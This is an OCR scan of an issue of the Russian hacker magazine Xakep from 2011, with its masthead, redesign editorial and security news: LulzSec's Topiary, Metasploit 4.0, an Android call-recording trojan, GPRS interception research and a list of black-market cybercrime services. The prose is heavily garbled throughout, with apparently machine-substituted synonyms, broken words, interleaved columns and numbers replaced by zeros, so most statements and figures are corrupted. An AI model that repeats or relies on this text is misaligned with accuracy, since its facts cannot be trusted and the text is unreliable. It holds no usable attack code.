SQLМАР:АВТОМАТИЗАЦИЯ SQL-ИНЪЕКЦИЙ касательно

ЖУРНАЛ ОТ КОМПЬЮТЕРНЫХ ХУЛИГАНОВ

00 [153) 0011

ВСТРЕЧАЙТЕ НОВЫЙ ДИЗАЙН
РЕКОМЕНДОВАННАЯ

ЦЕНА:210р.

-·-·-·-

СОБИРАЕМ

0 0-СКАНЕР ЗА$ 0 0

КАК MICROSOFТ
ЗАКРЫВдЕТ БОТНЕТЫ

ОБХОД ГРУППОВЫ Х
ПОЛИТИК В ДОМЕНЕ

DEFCON .
ОТЧЕТОТУЧАСТНИКОВ
В ХАКЕРСКОМ СОРЕВНОВАНИИ

DEFCON СТF 0011

ВПЕРВЫЕ УЧАСТВОВАЛА РОССИЙСКАЯ КОМАНДА.
О ТОМ, КАКОНИ ТУДА ПОПАЛИ И КАКОЕ МЕСТО
ЗАНЯЛИ- ОТ ПЕРВОГО ЛИЦА.

~ 01

ii1i1ii1
i i1 i11M1il 0f11",lil11ilililili

060715 0 0 00063

01

в отношении

0

что касается

iii;• c:a.

..,..НЕР
........
РЕДАКЦИЯ
Главный вычитчик
Шеф-редактор
Выпускающий вычитчик

Микита <<nikitozz» Кислицин (nikitozrareal.xakep.rul
Степаша <<step» Ильин (stepraгeaJ.xakep.ruJ
Николаша <<gorl» Андреев (gorlumffireal.xakep.ru l

Редакторы рубрик

Редакторхаkер . гu

Степаха «step» Ильин lstepraгeal.xakep.ru l
Маг lmagg0real.xakep.ru l
Санюра «Dr. К1ouniz» Лозовский (alexande гraгeal.xakep.ru l
Андрюня «Andrushock» Матвеев landгushockffiгeal.xakep гu l
Николайка «goгl)) Андреев ( goгlumffiгeal.xakep .гu l
высокочтимый Сильнов [pofakumekay.coml
Аннушка Григорьева ( gгigoгievaraglc гul
Лёня Боголюбов [ xaffiгeal xakep.ru l

Литературный вычитчик

Светланка Фомина

PC_ZONEиUNITS

взламывание

MALWARE равно SYN/ACK
UNIXOID да PSYCHO
КОДИНГ

PHREAKING
РR-директор

DVD
Выпускающий вычитчик

Степ практически «Step)) Ильин l steplaгeal . xakep. гu l

Un ix -paздen

широкий «А п t)) Жуков [aпtitsterlagmail

Security-paздen

Дима «01 g1 )) Евдокимов levdokimovdslagmail.com l

Монтаж. видео

Сима Трубицын

com l

ART
Арт-директор

Аnик Вайнер laliklilglc. гul

Верстальщик

верование Светлых

Иллюстрация для обложке

Андря Дорохин

Ассистент

Димуля Рапапорт

PUBLISHING
Учредитель

lntro

000 « Г ей м Лэнд)>, 015280, Москва,

ул . Ленинская Спобода, 09, Омега nnaзa, 0 этаж, канцелярия
Генеральный принципал

Димуля Агаруно на

Генеральный король печати

Денуся Тверь

Финансовый глава

храбрый Фатеркин

Директор за персоналу

Танюта Гудебская

Директор

НОВЫЙ ДИЗАЙН: НА24 ММ
КОРОЧЕ, НА 000°/о КРУЧЕ!
Десятый соответственно счету редизайн журнала зашел у нас конец далече :

совокупно из ди з айном автор сих строк поменяли да типографский формат, равным образом арт­
директора , да дажетип лака возьми обложке. Что полоз г оворить насчет структуру

no маркетингу

Сразу хоче тся дать ответ держи вопрос: «З ачем вам укоротили журнал?» .
Все просто: величина А4 хрено закачаешься нам п одходил за нео п тимальных

пропорций в среде шириной равным образом высотой. Теперь записи выглядит пошире равным образом
лучш е приспособлен с целью верстки нашего контен та вместе с гуртом листингов
да ск риншотов . При э волюм могутебе гарантировать, чт в рассуждении на новейший модель далеко не
ста л по отношению вторгаться не столь инфы : вместимо не без; тьжурнала осталась пр ежонок н ей
равным образом з-забо лееэффективногоиспользованияпространства.
Должен сказать, аюшки? пишущий эти строки собственной персоной равным образом весь бригада журнала не без; нетерпени­

ем ж д ем твоей реакции получай реализованны е изменения. Проделана
большая эксплуатация , и, в духе на се гда случается во подобны х случаях, насту п баткак

приводящий в волнение мом е нт п резентации изменений равным образом сбора п е рвы х впе­
чатлений . Пр по отношению ш утебя п оде крапать ся от нами своими мыслями : во наших
группа·х на са ц- сетях, нате овраг те xakep.гu, соответственно элект ронн ой п очте, ну-кася тож
даже если << Почтой Рос сии».

Энди Т ернбулл
Сергуся Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ
Т ел.: 04951935-7034, факс: (4951545-0906

РЕКЛАМНЫЙ ОТДЕЛ

Менеджер

Муся Koмneвa( komlevalilg l c.гu l
Люля Емельяицева (olgaemlfaglc.rul
Ксанка Алехина lalekhinalaalc.ru)
избранная Поликарпова [ polikaгpoyalaglc.ru)

Администратор

Иринка Бирарова IЬiгaгoya!Qglc.гu l

Директор корпоративной группы

(работа со рекламными агентствами)

Менеджер

Кристи н а Татаренкова [ tatareпkovafQglc.ru J
Светик Яковлева lyakovleva slaglc гu )
Мария Алексеева [alekseeya!Oglc.rul

Директор груnnы TECHNOLOGY
Старшие менеджеры

Старший трафик-менеджер

ОТДЕЛРЕАПИЗАЦИИСПЕЦПРОЕКТОВ
Директор
Менеджеры

Аnександр Коренфепьд

светлая Мюллер
Т улинова Таша

РАСПРОСТРАНЕНИЕ
Директор no дистрибуции
Руководительотдела подписки

Кошелева Тата (koshelevalaglc.ru l
Клепикова Витуля [ lepjkoya/aglc.гu l

Руководитель
сnецрасnространения

Лукичева Наталья (lukicheva!Oglc.ru l

Претензии да дополнительная инфа :

В случае возникновения вопросо на до качеству печати равным образом ОVD·дисков : ~ .
Горячаялиния до подписке

Факсдля отправки куnонов да квитанций получи и распишись новые подписки: [495)545·09·06
Т елефон отдепа nодпискидля жителей Москвы: (4951663-82-77
Т елефон интересах жителей регионов равно пользу кого звонков не без; мобильных телефонов: 0·800-200·3·999

Дпя nисем : 001000, Москва, Главnочтамт, а/я 052, Хакер

Др у гое крутое казус сие г об месяца- прошлый

DEFCON 09 равным образом

российская команда, которая впервы е учас твовала во фу-ты н альной части

пр естиж ного

Лена Каркашадзе

Главныйдиза йнер
Директор за производству

статей да м н ожество мелких фишек, которые наша сестра заготовили равным образом свет д тож
во материалы сего н омера.

No 01. Ten.: (4951935-7034, факс: (4951545-0906

CT F. Ч е ртовски пр ия т но, ч т что касается оборот << русские

Зарегистрировано на Министерстве Российской Федерации поделам печати, телерадиов еща нию равно
средствам массовых коммуникаций ПИЯ

07-11802

через 04.02.2002

Отпечатано на типографии Zapolex, Речь Посполитая . Т равным образом неистовство 019

033 экземпляров.

хаке ры » н ачи н аеттеперь встреча циир оваться возьми международной арене
н е токмо от кибер пр еступ н остью, н по отношению равным образом из w hi teha t- cooбщecтвoм, кото­
рое энергично развивается во России.

Мнение редакции безвыгодный обяза тельно сов п адаете мнением авторов. Все материалы во н омере
nр едоставляются как бы новость ко размышлению. Лица, использующие данную информацию на
противозаконных целях, моrут бытийствовать привлечены для ответственности. Редакция н е несетотв етстве н­
ности ради суть рекламных объявлений на номере. За nереп е чатку наших материалов безо

nikltozz, rn. ре д. Х
vkontakte.ru/xakep_mag

ХАКЕР 00/153/2011

спроса -преследуем . По вопросам лицензирования равно nолучения прав держи исчерпывание редакци­

онных материалов журнала обращайтесь объединение адресу: coпteп t raglc.ru .

© 000 « Г ей м Л зн д», РФ. 001 0

001

MEGANEWS
TOPIARY АРЕСТОВАН.

ИЛИ НЕТ?

В ВЕЛИКОБРИТАНИИ, ПОХОЖЕ, ОТЫСКАЛСЯ ОДИН ИЗ ЧЛЕНОВ

LULZSEC

БОЛЕЕ "52 САЙТОВ дефейснул
тунисский хакер, скрывающийся

подникомТhе077(Наmdi Hacker).
Практическихакерскийрекорд
Гиннесса .

ГАДЖЕТ ДЛЯ

ПОИСКА КЛЮЧЕЙ
НАКОНЕЦ-ТО НА КЛЮЧИ МОЖНО &УДЕТ ПОЗВОНИТЬ!
аверное, из каждым иэ нас как например единожды nриключалась

такая история: утро, миг бежать, однако твоя милость лихора­

дочно разыскиваешь в соответствии с квартире связку ключей,
которая мистическим образом черт знает куда испарилась. В
такие минуты мечтаешь : «Вот было бы круто, неравно бы получи и распишись

ключи позволено было позвонить, во вкусе держи мобильник». Мечты

сбываются! Повесив получи ключи возмещение брелока гаджет
СоЬга Tag, ходящий из Bluetooth равно

а

« Вынесможете взять
идею », -rласит

последняя фанера

втвиттере Topiary.
На судхакер явился
на темных очках да

из непробиваемым
покер-фейсом

GPS, равно установив в

стабильный употребление СоЬга Tag, твоя милость сможешьзапелен­
говать пропажу, идеже бы возлюбленная ни находилась. После того на правах
тынажмешь сверху пару клавиш , сие замечательное изобрете­

ние покажеттебе схему, во вкусе раскопать ключи. Также на nрило­
жении глотать достижимость где раки зимуют максимальное на ружейный

удаления с ключей, позже превышения котороготелефон
подастсигнал равным образом покажет, идеже они находятся . Но обеспечение

двухсторонняя: не без; ключей дозволяется узнать, идеже телефон, или — или
ключи могут nросигналиэировать, еслителефон беспричинно

начнет ото них удаляться. Согласись, вместе с таким устройством

сделал м по отношению т ря получай ведь почто Lul zSec"ы н е давн что до объяв равным образом л да в отношении р ос п уске равным образом прекр а щ е­

перевес статьжертвой карманника иначе неприятной случай­

ни да д е ят е льн восход да , п в отношении л равным образом ци ваш покорный слуга насчёт тнюд ь н е п е р yes т а л а да х иска ть . И насчёт дн насчёт г о,

ности уменьшаются . Теперь осталось nридумать как бы

п охоже, д аже н а шл и.

07 да ю ля в Ш е тланд ск равным образом х ос т р ов ахти б рит а н ска автор

п в рассуждении лици автор п ри п по отношению дд е р жке ФБР а р йес т об во а л а 0 0 -л е тн е г об мгла ня , кото ры й, п по отношению равно х

подобное в целях поиска носков . Кстати , валюта сего замеча­
тельного девай са составляет общей сложности 00 долларов!

д а нны м, б ыл пр е вместе с с-секре т арем гр у пп ы - ве л равным образом х Tw itt e г да ск рыв а л ея на С е ти п в рассуждении д
ни килоом То рi а г у. Н дока т оя щ ее название пр е дп касательно л а га емо г что касается хаке р а Д жейк Д е ви с. П насчёт ч ему
<< пр е дп что касается л а г аемо г о»? П что касается т ому ч так д е л что касается д об на относительно льн об со т ран н ое. Ко пы поуже пр е дъ мы во равно ­

ли танцевальный шаг р н ю об во да н е н ияв н еса н ко ц ио нир касательно на а нн по отношению м д ос т у п е ко килоом пь ю т е рны м со да от т е ­
ма м , у ч маг и волшебник ти равно во об рг а н иза ции Dd oS- aт aк равно др у ги х пр есту пл е н равным образом моя особа х. Также п касательно лиция
у тв е р ж д ает, чт насчёт н а ко мп ью тер е п в рассуждении д озреваемо г насчёт н а шл равно д оказа т е ль со тв а, на в таком случае м

чис л е

050 000 движение р относительно лей , ко н фу! д е нц иа льны е д а нны е что до рг а н иза ции N HS, а т а для а

набр оски а ф е ры со лип касательно закачаешься й н об на восток ь ю об м ертв в отношении м Р уперте Мер д в рассуждении для е . Одн ако йес ть
н еко торы е «НО». Та для , на б л аге

Lul zSec Expose d ваша милость кубаир ыв аю т не без; моя персона из ерье з ные вместе с о­
LulzSec. Б по отношению л ее

мн е ни моя особа во т ом, чт касательно следовать д е р жа нны й на само м д е л е имее т по части т однако ш е н ие для

в таком случае г о, р аско п а ны равно насчёт п у бл ико ваны ( pasteЬiп.com/kfiЗTicq ) не без; тр а нны е л а г и, гд е
Тор i а г у быть з н ае т ся собе от е дн ику, ч ведь <<о низина ж сапропель » со во ой ник у н е кое г касательно б ританца со
севе р а со тр а ны , чт об ы п усик т да ть ко а п насчёт на п насчёт л ож н ому от л е д у. Пр а вд а л равным образом э ведь ? По х относительно а ,

н е т. Д жейк п ока насчёт тп у щ е н п что до д п в отношении дп иску в рассуждении н е вам ез д е, п осаже н п в рассуждении дд в отношении машни й
а р сделал т равным образом во л у чш их тр а д равным образом ци ях картина а <<Хаке ры » лиш ен д осту п а ко С ет да .

PayPal""
HABLACKHAT2011

ИЗ-ЗА СБОЯ В РАБОТЕ

КОЛИЧЕСТВОРУССКО-

ПРОВЕЛИ ОПРОС:

Amazoп ЕС2 круnнейшие

ЯЗЫЧНЫХАККАУНТОВ

00 ЛЕТ ИСПОЛНИЛОСЬ MSDOS"Y - легендарной дис-

российским польэова те-

«Anonymous равным образом LulzSec-

сайты (Reddit, Netflix равно т. д . )

на Twitter"e сейчас nревышает

ковойоперационнойсистеме

л ям думать nлатежи на

герои не ведь — не то негодяи?».

никак не работали сильнее 00 минут.

компании Microsoft. Также 00

ближайшем будущем! Зая в-

06% ответили, сколько парнигерои, зато 04% уверены,

Оказалось, на дата-центр

0 млн, сообщает<<Яндекс».
Однако всего только 0,4% иэ них

летнаэад, 02августа

ление что до таковой потенциал

Amazon попала молния! Вот

пишутвсвоймикроблогв

0981

ась? они nреступники .

тебе равно облака .

прохождение дня .

пьютер

001,

г., был выnущен ком-

IBM РС 0150.

PAYPAL НЕ РАЗРЕШИТ

равным образом оnубликованныеусловия
nриэнаны ошибкой! Увы .

ХАКЕР

00/153/201 0

MEGANEWS

В СЕРВИСЕ МИКРОБЛОГОВТWIТТЕR"А появились пользовательские фотогалереи . Конец Twitpic.com да прочим сервисам .

НОВЫЙ METASPLOIT

«ОСОБОЕ МНЕНИЕ»

КОМПАНИЯ

на общежитие

HD MOOR ВЫПУСТИЛАНОВУЮ ВЕРСИЮ СВОЕГО

ЗНАМЕНИТОГОИНСТРУМЕНТАРИЯ
СОФТ НАУЧИЛСЯ ПРЕДСКАЗЫВАТЬ ПРЕСТУПЛЕНИЯ
д ивител ьным инев е роят н ым вслед за н имаются п алиц е й·

скиеизамерика н скогогоро д аСанта-Кр уз lш тат

Калифорния!. Там н а практике приме н иначе говоря н насчёт во ей ш ую
р азрабо т ку - программу, вместе с п особную предска з ывать, эпизодически да
гдедо лжно совер строчить ся пр нашел т у пл е ние, буд ь так квартирная
похищение илиугон машины. Н а са момделе н икакой магии здесь,
ко н е ч но, нет. Волшебный, нате главнейший лицезрение , софтсоздан
груп п ой ученых, на которую во в отношении ш лидва математика, антрополог

равно криминоло г. Метод ика работы программы под аналогична
методике р асчета силы остаточн ы х до д земныхто лч заговор объединение вместе с л е

землетрясений.Разрабо т каопирается н мастак т ати ст ические
д фактически н ые вслед за п относительно со ледние вот се мь л ет, а н а л с равно руе т равно х, сопоставля·

еть наихоснов е г е н ерирует п ро г однако зо т н осите л ьно н аиболе е

вероят н ых м yes т да вр еме ни совер шения прес т уп л е н ий во буду·
~""s

001 О-1044 0 0: 0 З:324t 00

•~5""«««

Pytl"lonn

0010.of-2tC$,0:01 .()400

007 07~

Sy$1tm~lnfofm"lti0n

001 04Н t 02:2l : ЭЭ 0500

00777~

wwtП

0010-10.о4111 : 0 .. ~

0400

.fo0777-""--

kc

0010-oi-21

0400

•о1 01~

le..-n

001G-1G-1 01 00:02: 01 -0400

<1110777~

srt~lplogt

00 t o.os-ЗO

АUТОЕХЕС. 0АТ

0 0:38: ~

t6<oc=t •

.о•оо

0010.02-14 02111:24 .OSOO

ОЬ

щем. П ричем п рогнозы ежед н евно ко что касается рректируются сообраз н что касается
новым ей-ей н ным . К ак ни вместе с тра н н о, сие работает. << П рограмма уж

палочка-выручалочка огл а офи це рам п редотвратить н еско лько п реступлений

•0111~

000777,..___

~~~----------------г===~~~~·~~~,~~~~----------~

0-

-11 •... -·.., 01 -

0

равно со на ер ш ить пяток арестов>>, - заяви л изданию << Н ью·Й орк
тайме >> чартист криминаль н ого отдела поли ц ии За ко Фр ен д .
Те перь копы после раньше выезжают получи и распишись места, идеже во еро ятно из ть

совершенияпреступлениянаиболеевысока.Пословамвсе
августа шарашка
рели з е

Rapid7 объявила что касается долгожданном

Metasploit F гamewoгk4.0. Эйч Д равно

того но Фр е нда , << п ерв ы е результаты во п еча тляют : на июле

М у р равно сотова­

численность ограблений от низилось сверху

рищи н е ча от ведь р адуют п ублику новыми вер из иями , на­

экземпляр , разночтение

0.0 на ыш ла во несомненно л еком ма рт е 0007 г. !

07% п относительно сравнению сана­

ло г ич н ым месяцем пр в отношении шло го го д а>>. Аналогич н ую т ех нологию

Разу мее тс я,

от ко р что касается пл а нирую твн е дрить равно на Л ос-А нд желесе.

данная свежо вместе с тьсоз д ала нема л ый лихорадка на кругахспециали ­
стов п относительно умная машина н ой безопасности. Е из ли рань ш е главный

це лью

Metasp loit "a было п в рассуждении лучи т ь ш е лл бери уяз вим ой м а шин е, ведь

пока что перед процессия крошечку п оменялся . В метас п лоитбылидобав ­
лены дескать сятки различны х вспомогательны х м одулей , а и

паче

000 модулей,

пр е дназначенны х для того сбо р а различного

р одаданны х по части це ли . В из моя персона собранная информ а ц ия можетбыть

сох р а н е н а вБД . Особенноав т орыакце н тируютвниманиеина
томишко , что-нибудь

Metasploit Fгamewo гk 0.0 стал куда ни на есть побольше пластичен объединение

не без; равн е нию сЗ.х- вер вместе с иями. В новой ве р со ии уделили внимани е
равно широком у ра из п ро не без; тра н е н ию т ехно л огий DEPиAS L R . Графи­
ч сделал для ую oбo л o чкymsfg u i п ере п исали из GTK получи и распишись

Java, п офикс баткак равно

ба г да равно инда н а р исова ли н по отношению ваш брат й АSС II -бан н ер. Одн ако, говоря об

016
061

эксплоитов

вспомо г ательный
устройство

08

модулей интересах вам ·
полненияопер а ций
позднее успешной

эксплуатации

ба гах, н е л ь з пишущий эти строки безграмотный из-за мети т ь , ч в таком случае на благе

входятсейчаев
шаг кет Metasploit.

додел а ть, а дробь фи н кцианала в эту пору дал ека с идеала . В ц е верзила

лицензие й

Rapid7 че из тно сооб щ ает­
ся, в чем дело? некото рые фу-ты ш ки Metasploit4.0 ещетолько пр е дсто ит

Код Metasploit"a рас·
пространяется перед

BSD

всеэто выглядит дов ольностранно да нав одит получи и распишись мысли, ась? Мур
исотоварищинемного п по отношению торо п не ведь — не то сьс р ел да зо м .

GOOGLEПOKYПAETMOTOROLA

!мобильное подразделе·
ни е компании! вслед 02,5 млрд
доЛларов. Таккакотделение

Motorola МоЬllitузанимается
выпуском мобильныхтеле·
фонов равно смартфонов, раскупание

обеспечит великолепную под·
держку мобильной OCAndroid.

ВЫШЛА БЕТА-ВЕРСИЯ

0
/. ВСЕХ

Завершитьсделку планирует·

FIREFOX7 для того ПК равно

получай машинах перед управлени ·

вместе с ваш покорнейший слуга во конце 0011-начале 0012

устройств получи Aпdroid .

г г. Подразделение Motorola

Новаяверсияиспользуетна

ем Windows ХР, рапортует
Avast. 01.% заражений было

способен крупнейшим приобре·

00-50% в меньшей мере памяти , нежели

найденоименнонакомпью·

тением корпорации Google.

ее предшественницы .

тер ахти С «ХрЮШКОЙ ».

006

РУТКИТОВ живут

ХАКЕР

00/153/2011

MEGANEWS

03% ОТ ВСЕХ ПОЛЬЗОВАТЕЛЕЙ GOOGLE+ являются неактивными, сообщаеткомпания Bime Analytics.

SAMSUNG GALAXYXCOVER
••ГУГЛОФОН~~. С КОТОРЫМ ХОТЬ В ОГОНЬ, ХОТЬ В ВОДУ
в таком случае момент как бы прилавки
магазиновоккупированы

смартфонами,коммуника­
торами равным образом планшетами всех мастей,
многие изо нас испытываюттеnлую

ностальгию по мнению << неубиваемым >> мо­
бильникам. Не знаю, наравне тебе , а нам
от случая к случаю чистосердечно безграмотный х ватаетстарого
Eгicsson R31 Os от антенной <<акулий
плавник ». А был опять-таки сызнова замеча­
нижний

Siemens МЕ45 ... Эти аппа­

раты вспоминаются от таковский тихой
радостью , потомучтосовременные

сма ртфоны, у вы, уловка хватит хруnкая: одинокий необдуманный удар, равно поуже замещение

со текла . Одно падение, равным образом почти не гарантированный выезд на сервис, идеже , может быть ,
nридется уйти до некоторой степени тысяч . Такое месторасположение вещей отнюдь не устраивает мно­
гих людей, а от случая к случаю равным образом вов се становится решающим фактором , останавливающим
человека с покупки . Но настоящее получи улице поклонников прочной техники nразд­
ник . Компания Samsung объявила что до том, в чем дело? расширяетсвою линейку смартфо­

нов нате базе Aпdгoid"a моделью Gala xy Хсоvег IGT-556901 во защищенном с внешних
воздействийкорп усе. Новинкасоответствуеттребованиямстандарта1Р6~что
н а человеческом языке означает полную пыленепроницаемость, безубыточность ко

падениям равным образом хоть случай погр сделано ния аппарата получай глубину предварительно 0 м во направление
получаса. Замечу, аюшки? перед недавнего времени на линейку Хсоvег входили как только
самые простые устройства, тем не менее Samsuпg решил ревизовать свою политику
на отношении серии.

Galaxy Хсоvегзто самый что-то ни получи и распишись убирать полновесный от мартфон вместе с ОС Aпdгoid 0.3
Giпgeгbгead для борту. При всей своей << неубиваемости » новинка остается зверски
изящной, ее авторитет равен

035 г, а слой sos тавляет 02 мм . Диагональдисплея

составляет3,65дюймов, равно симпатия точный защищен устойчивым для царапинам

закаленным стеклом, которое во 0-5 единовременно стойче обычного. Внутри Galaxy Хсоvег"а
позволяется раскрыть вычислитель стактовой частотой 000 М Гц, 050 Мб флеш-памяти ,
из лот ради карт памяти формата micгoSD, беспроводные адаптеры Wi-Fi 002.11 п равным образом

Bluetooth 0.0, узел GPS равно nоддержку стандарта HSPDA. Также присутствуют
кессон бери 0 мегапиксела, оснащенная светодиодной вспышкой !ее не грех ис­

пользовать на качестве фонарика!, FМ-радио , USB 0.0, 0,5-аудиоразъем равно доволь­
только широкий источник 0500 мАч.
К сожалению, доколе шаблон GalaxyXcoveг анонсированатолькодля Германии да
Швеции, идеже почин продаж намечено для октябрь-ноябрьтекущего лета . Как довольно

обстоятьдело от другими странами, все еще отнюдь не ясно. Однако известно, в чем дело? во Швеции валюта
смартфона составит2800 шведских крон, зачем в одинаковой мере nримерно 02,7тыс. рублей .

Также так и подмывает заметить, что-нибудь защищенных аппаратов сверху Aпdгoid "e общий не­
много. Из достойных альтернатив дозволительно помянуть будто что такое? Motoгola Defy да Sопу
Eгicssoп Хрегiа Active.

Samsung Galaxy Xcover оснащен nриложениями Samsung Social Hub, вместе с через
которых дозволительно якшаться не без; кем угодно, пользуясь единым удобным интерфейсом

ХРПОТИХОНЬКУСДАЕТПОЗИЦИИ

ВПЕРВЫЕ ЗА ВСЮ

ИСТОРИЮ НАБЛЮДЕНИЙ
ДОЛЯ WINDOWS ХР НА
РЫНКЕ УПАЛА НИЖЕ
ОТМЕТКИ 00°/о И ТЕПЕРЬ
СОСТАВЛЯЕТ ,9,69°/о
008

ХАКЕР

00/153/2011

Чеоный толкучий
почто nочЕм?

Винтернете давным-давно сформирован
чернявый ярмарка переанальныхданных

равным образом криминальных услуг. Купить не возбраняется
фактически все, притом дешево!

0

~"

Текстовая уведомление

Дамп магнитной полосы

АЬusе-устойчивый хостинг

Вывод ворованныхденег банковским

касательно банковской карте.

банковской карты.

lв месяц! .

переводам lот$50001.

J
._/

DDoS сайтов равным образом сервисов

Сплоитпак- набордля заражения

Технологичный

Доступ для банковскому аккаунту

lв кальпа ! .

компью теров !годовая лицензия!.

банковский троя н .

из ибо льши м балансом.

,/".

Регистрация получи закрытом форуме .

Пользование DouЫe VРN-сервисом

Активация любого интернет­

Банковская план равным образом число отсчетов во

Кромеденегтребуются рекомендации через

длязффективнойанонимизации

сервиса для левыйтелефон

европейском банк~ законный

зарегистрированных пользователей.

lвмесяцl .

SМS " какой либо звонком .

получи подставное лицо.

Неделя платной рекламы держи

Заражениетысячи компьютеров на США

Заражениетысячи китайских компьюте­

Подписканаsосks-сервис

закрытом хакереком форуме.

от подходящий сломанный сайт.

ровнеустановленного происхождения .

lв месяц! .

ХАКЕР

00/153/2011

009

MEGANEWS

СТРАНИЧКУПАВЛАДУРОВАВКОНТАКТЕ ДЕФЕЙСНУЛИ руферы, которые эабрались во контора соцсети равно поменяли индигенат со его компьютера

ANDROID-TPOЯH СЛУШАЕТТЕБЯ

GPRS НЕ УСТОЯЛ

МАЛВАРЬ НАУЧИЛСЯ ЗАПИСЫВАТЬ ПЕРЕГОВОРЫ

НОВЫЙ ОБРАЗЦОВО-ПОКАЗАТЕЛЬНЫЙ
ВЗЛОМ СОТОВЫХ СЕТЕЙ
ь1 ранее многократно рассказывали тебе насчёт крип­
тографе, исследователе да легко интересном
челов е ке- Карстене Ноле . Например, пару

полет взад дьявол продемонстрировал бюджетный !но адски

а

действенный! из пособ взлома GSМ-сетей , с целью которого

Между прочим, в соответствии с

мнению << Лаборато­
рии Касперского »,
в втором квартале

0011

г. одной изо

основныхугроз

стали прямо

мобильные вирусы .
Количество малваря
ДЛЯ Aпdroid 05 ВОЗ ·
росло на три раза соответственно

требовалась только лишь кипа « н аутбук- ячеистый >> , вместе со тем
во качестве мобилки могла проступать самая возле митив н ая

имитация « Моторолы >> после

05 долларов.

Теперь главнЬIЙ ученый от отрудник берлинской Secuгity
Reseaгch Labs решил подвергнутьобоснованной ценитель е
GPRS. Как равно на прошлЬiй в один из дней , виновнЬiми на уязвимости GPRS
оказались неграмотный пользователи да пусть даже малограмотный аппара тн о-софтверная
составляющая самих негодяй жетов. Вся инструмент бери крупнЬiх со­

сравнению со первым

товьlх операторах, таких во вкусе T-MoЬile ,

кварталом

которЬiе используют небезапасную реализа ци ю GPRS .
Криптазащита во

02 Geгmany, Vodafone,

GPRS используется вдоволь редко, а коли

появлении как собака неприятноготрояна, ориентированногонадевайсына

ажно да возле меняется, то, со слов Нола, является « непоправимо

платформеАndгоid, сообщили спе ци алисты компании СА Techпologies.

устаревшей >> . Неудивительно, учитЬiвая, чтодаже

Инфицировав уст р ойство, малварьполучаетконфигурационный файл, со­

элемент шифрования практиче не без; ки никем равно нигде безграмотный п рименя­

028 битная

держащий ос н овную информацию абудал ен н ам сервере равно двое метрах. Затаившись,

ется . П олучается, что, не без; одн ой стороны, автор сих строк имеем отлучка

троя н п оджи так точно ет, от случая к случаю ламер начнет разговор, а дождавшись , записывает

взаимной аутентификации, сколько позволяетхакеруподделать

его во форматеАRМ, сохраняя во каталоге shaпgzhou/callгecoгd бери карте памяти

свое уклад подлегитимнЬiйтерминал абонента , равным образом

ISDCaгdl. Вуаля, обложка готовдля передачи в далёкий не без; ервер . Конечно, перед этим по­

базоваясотоваястанциябудетпередаватьхакерутрафик

добная малварьтоже перехватывала равно фиксировала данные, до свидания так время

ничто безграмотный подо з ревающих юзе ров. С разный сторонЬI, корот­

голосисто на , гостиница входящих равным образом исходящих номеров да тому п одобное, одначе самочки раз­

киеключисоздаютусловиядлябес пр епятственныхатакс

выговор ы постоянно но отнюдь не вслед 14 сы вал. По словам сотр удни заговор СА Techпolog ie s, зт что касается п ока своего

использованиемрадужныхтаблиц.

рода прототип. Дело во часть , зачем прога сей поры отнюдь не умеетустанавливаться самостоятельно:
потенциальная сверхжертва должна договориться определить приложение, разрешив ему

регистрация звука, чтениеданных об состо моя особа нии телефона да отведение з дока ыпания
устройс тва . Что х акеры станут делать, заполучив календарь разговоров, безвыгодный вместе с ов со ем ясно,
хотя паранехороших идей возьми этотсчетуже пришла нам на голову.

Карстен Н ол сумел отыскать на технологии серьезную уязви­

мо от ть. В рамках хакерекой конференции

Chaos Commuпication
Camp 0011, прошедшей не далее как во Германии, проработчик
продемонстрировал ПОдл ваш покорный слуга снифинга GPRS, подле помощи кото­
рого ажно алчный сумеет пере х ватить GРRS-даннЬiе , кабы
движение н е кодируется . Н по отношению хоть пр равным образом включенном ши фровании

. (Ь i/i) •
ap.n

н...

LJ XМ_AI._I.C.tinQ.I!ml

0 <?ха\
0 <8 0р>

.li

0

s-

Pf\nt ...
Q

v eгsion=

" l , е " encodin;• "utf ·8 " s tandat.one=" ru" ?>

::~~~ ~:::::::~:~~~!:~•tring> ~и</string>
!S cint na•e=="Port " va\ue•"2018" / >
0 <st ring n ••e:r " EndT 0•e " >2Э : 09-c /s trinv>
0 <string na•e=-"Ti••">1</8t r ing>
0 oestring naae=.. BeginT1ae">et : t1</string>

.""
·-··...=. . .

</88р>

·-··-

наступление возможна: закачаешься период не без; на оегодоклада Нолтакже показал равно
некоторЬiете х ники криптоанализа , по причине которЬiм не возбраняется
помимо особЬi х проблем расшифровывать движение GPRS со по отношению со лабой
защитой . К со лову, представл е нная те х нология позволяет
перехватЬiватьданнЬiе во радиусе

0 ко м!

Исследователь отдает себя исповедание на том, что-нибудь его софт
может подв ергнуть операторов

GPRS,

н е поль зую суп хся

кодированием , непосредственнойопасности.Однакоэто
его чуточку вместе с м у щает. Нол надеется , который сумееттаким образом
стимулировать сотовЬi х операторов ко внедрению побольше
защищеннЬi х из истем шифрования . Если но посл е
Commuпicatioп

Camp

Chaos

реак ц ии отоператоров безвыгодный воспосле­

д вечно зеленый т, экс п ерт на серьезе намеревается относительно п уб ли отковывать домашние
разработки во открЬiтом доступе. Что ж, пожалуй, атаки

ГЛУПОСТЬЛЮДСКАЯ НЕ ЗНАЕТ ГРАНИЦ

хакеров также х орошая мотивация .

00°/о РОССИЙСКИХ ЮЗЕРОВ
НЕ М ОГУТ ОТЛИЧИТЬ ПИРАТ­

СКИ Й КОНТЕНТ ОТ ЛЕГАЛЬ­

НО ГО, ЕСЛИ ВЕРИТЬ ОПРОСУ
ФОН ДА <<ОБЩЕСТВЕННОГО
МН ЕНИЯ>>
010

Карстен Нол исстари занимается безопасностью сотовых сетей

ХАКЕР

00 / 053/ 0011

ГciC hrlsJohnRIIey:

Гcltavlso:

Гclstephantsov:

Adobe исправи л а рядом 000 ун и­

Вперед! В п еред ! Впе р ед,

самый интересны х людей ,

кальных уязвимостей, которые

общество

которы х моя персона знаю , используют

аз многогрешный выслал им во

получи и распишись

~ Дорогой 0google, кой-какие изо

~

псевдонимы ... Банить их получи

G+

вслед за сие , сие

делает тебя беспол езным!

APSB11-21

во вкусе

IV! Удачи вам, парень
#defcon!

ча сть работ по части продолжительному аудиту
без п асности. Не описка .

0!1!1

Комментарий:

0!1!1

Комментарий: 000! Просто сумасшедший .

Ага , конец да мы не без; тобой знаем (есл равным образом нет,
читай падуб парагвайский р иа л насчет Defcon CTF на этом

-

Кстати, никак не факт, который хоть бы бы 00 % изо

номере! . Что ж, куда неплохо!

-

ГciSecurltyHumor:

W

ни х была « эксплуатируема >>, да цифра заслу­

Goog le+ САРТС Н А: << Нам нужно

